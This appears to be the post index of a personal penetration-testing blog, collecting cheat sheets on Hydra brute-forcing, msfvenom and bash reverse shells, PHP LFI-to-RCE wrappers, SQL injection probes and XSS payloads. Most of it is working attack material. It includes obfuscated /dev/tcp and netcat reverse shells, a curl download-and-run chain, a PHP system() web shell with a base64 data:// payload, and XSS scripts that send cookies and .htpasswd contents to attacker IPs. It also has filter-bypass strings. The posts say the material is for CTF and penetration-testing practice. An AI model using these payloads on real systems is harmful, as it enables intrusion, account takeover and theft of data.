Gajendra Mahato

Brute Force Login Page with Hydra

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we'll explore brute-forcing login pages using different HTTP methods with Hydra.

Brute Force Login Page with HTTP GET Method:

    hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080
    hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html

Initiates the Hydra tool and specifies the target URL using the HTTP GET method.

Brute Force Login Page with HTTP POST Method:

    hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088
    hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f

Initiates the Hydra tool and specifies the target URL using the HTTP POST method.

Brute Force Credentials of POP3 Protocol:

    hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007

Brute Force Credentials of SSH Protocol:

    hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP

Brute Force Credentials of SNMP Protocol:

    hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137

Hydra Options Explained:

    -C <file>: Specifies the path to the file containing a list of username:password combinations, e.g. admin:admin.
    -L <username file>: Specifies the path to a file containing a list of usernames.
    -l <username>: Specifies a single username to use for the brute-force attack.
    -P <password file>: Specifies the path to a file containing a list of passwords.
    -p <password>: Specifies a single password to use for the brute-force attack.
    -f / -F: exit when a login/pass pair is found (-M: -f per host, -F global).
    $IP: Represents the IP address of the target.
    -s <port>: Specifies the target port.
    http-get: Initiates a brute-force attack using the HTTP GET method.
    http-post-form: Initiates a brute-force attack using the HTTP POST method with form parameters.
    pop3://<IP>: Specifies the POP3 protocol and target IP address.
    ssh://<IP>: Specifies the SSH protocol and target IP address.
    snmp://<IP>: Specifies the SNMP protocol and target IP address.

Additional flags and options may be included for more detailed configuration and verbose output.

January 13, 2026 · 2 min · Gajendra Mahato

FFUF - Fuzz Faster U Fool

1. Directory and File Brute Forcing

Basic Directory Fuzzing:

    ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/

Fuzz common directory names (e.g., /admin/, /uploads/).

2. Fuzzing Parameters

Basic Parameter Fuzzing:

    ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ

Replaces FUZZ with words from the wordlist to test URL parameters.

Filter by Status Code:

    ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200

Shows responses only for the 200 OK status code.

Filter by Content Size:

    ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150

Filters results based on exact response size in bytes.

Fuzzing with JSON Payload (for APIs): ...

January 13, 2026 · 3 min · Gajendra Mahato

File Inclusion Cheat Sheet

File Inclusion and Path Traversal At a Glance

File inclusion is the mechanism by which applications and scripts include local or remote files at run-time. The vulnerability occurs when an application builds the path to executable code from an attacker-controlled variable, giving the attacker control over which file is executed. There are two different types: Local File Inclusion (LFI), where the application includes files on the current server, and Remote File Inclusion (RFI), where the application downloads and executes files from a remote server. 1 ...

January 13, 2026 · 6 min · Gajendra Mahato

Generating Reverse Shells with Metasploit's msfvenom.

Note: Always remember to use the same payload in msfconsole as you used to generate it in msfvenom.

Linux Reverse Shell (extension doesn't matter for Linux)

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf

Payload Type: Shell Reverse TCP
Suitable for: Linux systems, Netcat listener required.

Windows x64 Reverse Shell

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe

Payload Type: Windows x64 Meterpreter Reverse TCP
Suitable for: 64-bit Windows systems, spawns a Meterpreter session. ...

January 13, 2026 · 2 min · Gajendra Mahato

HTTP Status Code

These codes indicate that the request was successfully received, understood, and accepted.

    200 OK: The request was successful.
    201 Created: The request was successful, and a resource was created.
    202 Accepted: The request has been accepted but not yet processed.
    204 No Content: The request was successful, but there is no content to send back.

3xx: Redirection

These codes indicate that further action is needed to complete the request.

    301 Moved Permanently: The resource has been permanently moved to a new URL.
    ...

January 13, 2026 · 3 min · Gajendra Mahato

RCE via LFI wrappers in PHP

Target File: .htaccess
Output with PHP String Filters

No Filter Applied
    Output: Testing PHP Filter

Payload: php://filter/convert.base64-encode/resource=.htaccess
    Output: VGVzdGluZyBQSFAgRmlsdGVy

Payload: php://filter/string.rot13/resource=.htaccess
    Output: Grfgvat CUC Svygre

Payload: php://filter/string.toupper/resource=.htaccess
    Output: TESTING PHP FILTER

Payload: php://filter/string.tolower/resource=.htaccess
    Output: testing php filter

Payload: php://filter/string.strip_tags/resource=.htaccess
    Output: Testing PHP Filter
    This filter removes any HTML or PHP tags from the file contents.

PHP Payload:
    <?php system($_GET['cmd']); echo 'Shell done!'; ?>

Payload for LFI to RCE:
    php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami
    Output: www-data

January 13, 2026 · 1 min · Gajendra Mahato

Reverse Shell Payloads for bash

    bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1'
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Reverse Shell Payload with Encoded Command

    bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash
    bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}

Best way to escape bad characters (Recommended)

    echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh
    curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh'
    bash$IFS'/tmp/revshell.sh'

Reverse Shell by using octal escape sequences

Generating RevShell (escape sequence)

    echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'
    echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

Generating RevShell (Hex escape sequence)

    echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g'

Executing RevShell (Never forget to URL encode if you are sending it via HTTP/S)

    printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh

Additional Shell Options and Tools

Don't forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

January 13, 2026 · 1 min · Gajendra Mahato

SQL Injection Vulnerability Exploration Cheat Sheet

Identifying SQL Injection Vulnerability Parameters

Comments in SQL

    --      MySQL Linux style
    --+     MySQL Windows style
    #       Hash (URL encode when used)
    --+-    SQL comment
    ;%00    Null Byte
    `       Backtick

To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include:

    id=[Nothing]
    id='
    id=''
    id="
    id=`
    id=')
    id=")
    id=`)
    id='))
    id="))
    id=`))

Examples of SQL Injection Testing

Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

January 13, 2026 · 2 min · Gajendra Mahato

XSS File Stealing Cheat Sheet

1. Steal File Content Using Inline XSS Script (HTML)

    <script>
    fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
      .then(response => response.text())
      .then(data => {
        fetch("http://10.10.14.228/?data=" + encodeURIComponent(data));
      })
      .catch(error => console.error("Error fetching the messages:", error));
    </script>

Explanation:
This script tries to read the .htpasswd file from a vulnerable server using a local file inclusion (LFI) or file read vulnerability in the URL parameter file. It then sends the stolen file content back to your attacker server (10.10.14.228) in an HTTP request with the data URL-encoded. Works in XSS vulnerable pages where you can inject JS.

How to use:
Inject this script into an XSS vulnerable parameter or stored XSS vector. Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter. Example listener (using nc or a simple Python HTTP server) to capture data:

    nc -lvnp 80
    # or
    python3 -m http.server 80

2. External JS File to Steal File Content via XSS (JavaScript)

    // Usage:
    // Spawn python HTTP server on attacker box: python3 -m http.server 1212
    // Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script>
    var url = "http://127.0.0.1/dir/pass.txt"; // Target file on victim
    var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js";
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == XMLHttpRequest.DONE) {
        // send base64 encoded stolen content to attacker server
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
      }
    }
    xhr.open('GET', url, true);
    xhr.send(null);

Explanation:
This script fetches a local file on the victim machine (http://127.0.0.1/dir/pass.txt) via the victim's browser. When the file is fully loaded (DONE), it encodes the content in Base64 (btoa) to safely transmit binary or special characters. It then sends this encoded content back to the attacker server by requesting the script file with the data as the query string (?data=...). Requires you to host this script on your attacker machine (10.9.179.230) and have an HTTP server running on port 1212.

How to use:
Start an HTTP server on the attacker box: python3 -m http.server 1212
Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page.
Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL.
Decode captured Base64 content:

    echo "base64_encoded_string" | base64 -d > stolen_file.txt

Summary Notes:
These methods depend on the target browser having access to local files via URL paths (like 127.0.0.1) or vulnerable parameters (LFI). Base64 encoding helps send files safely in GET requests. You must have control over the attacker server to catch stolen data. Use during CTF challenges, penetration testing, or in controlled environments. Always check the same-origin policy and CORS restrictions, which may block requests in real-world targets.

January 13, 2026 · 2 min · Gajendra Mahato

XSS Payload Cheat Sheet

🎯 Basic Payloads

    <svg/onload="alert(document.cookie)">
    <iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe>
    <script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script>
    <script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script>
    <script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script>
    <img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)>
    <img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/>
    <script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script>

🧨 Local File Access / Script Injection

    <img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
    <img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/>
    <img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);>

🕵️‍♂️ WAF Bypass Strings for XSS

    <Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
    <Video> <source onerror = "javascript: alert (XSS)">
    <Input value = "XSS" type = text>
    <applet code="javascript:confirm(document.cookie);">
    <isindex x="javascript:" onmouseover="alert(XSS)">
    "></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    "><img src="x:x" onerror="alert(XSS)">
    "><iframe src="javascript:alert(XSS)">
    <object data="javascript:alert(XSS)">
    <isindex type=image src=1 onerror=alert(XSS)>
    <img src=x:alert(alt) onerror=eval(src) alt=0>
    <img src="x:gif" onerror="window "></img>
    <iframe/src="data:text/html,<svg onload=alert(1)>">
    <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
    <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
    <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
    <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
    <form><a href="javascript:\u0061lert(1)">X
    </script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
    <style>//*{x:expression(alert(/xss/))}//<style></style>

📚 Resources

🔗 OWASP XSS Filter Evasion Cheat Sheet ...

January 13, 2026 · 1 min · Gajendra Mahato